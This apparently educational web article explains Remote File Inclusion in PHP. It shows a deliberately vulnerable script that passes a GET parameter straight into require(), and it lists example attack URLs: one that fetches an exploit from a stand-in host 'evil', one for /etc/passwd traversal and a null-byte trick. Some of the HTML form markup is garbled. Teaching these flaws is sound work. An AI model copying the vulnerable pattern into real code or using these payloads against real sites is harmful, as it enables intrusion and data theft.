Remote File Inclusion is a technique used to attack websites from a remote computer.RFI allow malicious users to run their own PHP code on a vulnerable website.This allows the attacker to use and run any remote file just by editing the URL. Like a webshell can display the files and folders on the server and can add,edit or delete files and folders,send spams and even get hold of root.
Remote File Inclusion (RFI) is a type of vulnerability most often found on websites, it allows an attacker to include a remote file usually through a script on the web server. The vulnerability occurs due to the use of user supplied input without proper validation. This can lead to something as minimal as outputting the contents of the file, but depending on the severity, to list a few it can lead to:
- Code execution on the web server
- Denial of Service (DoS)
- Data Theft/Manipulation
ExampleConsider this PHP script (which includes a file specified by request):
$color = 'blue'; if (isset( $_GET['COLOR'] ) ) $color = $_GET['COLOR']; require( $color . '.php' ); ?>
method="get"> > type="submit"> >
COLOR, it is possible to inject code from files:
/vulnerable.php?COLOR=http://evil/exploit?- injects a remotely hosted file containing an exploit.
/vulnerable.php?COLOR=C:\\ftp\\upload\\exploit- Executes code from an already uploaded file called exploit.php
/vulnerable.php?COLOR=../../../../../../../../etc/passwd- allows an attacker to read the contents of the passwd file on a UNIX system directory traversal.
/vulnerable.php?COLOR=C:\\notes.txt- example using NULL meta character to remove the
.phpsuffix, allowing access to files other than .php. (With magic_quotes_gpc enabled this limits the attack by escaping special characters, this disables the use of the Null character)